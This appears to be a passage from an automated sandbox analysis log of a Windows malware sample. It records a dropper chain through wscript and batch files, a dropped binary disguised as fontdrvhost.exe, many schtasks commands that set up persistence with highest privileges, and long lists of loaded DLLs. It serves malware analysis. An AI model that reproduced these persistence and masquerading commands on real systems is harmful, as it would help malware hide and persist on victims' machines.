                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeFile read: C:\Users\user\Desktop\YGk3y6Tdix.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\YGk3y6Tdix.exe "C:\Users\user\Desktop\YGk3y6Tdix.exe"
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 12 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                    Source: unknownProcess created: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                    Source: unknownProcess created: C:\Drivers\fontdrvhost.exe C:\Drivers\fontdrvhost.exe
                                    Source: unknownProcess created: C:\Drivers\fontdrvhost.exe C:\Drivers\fontdrvhost.exe
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe"
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
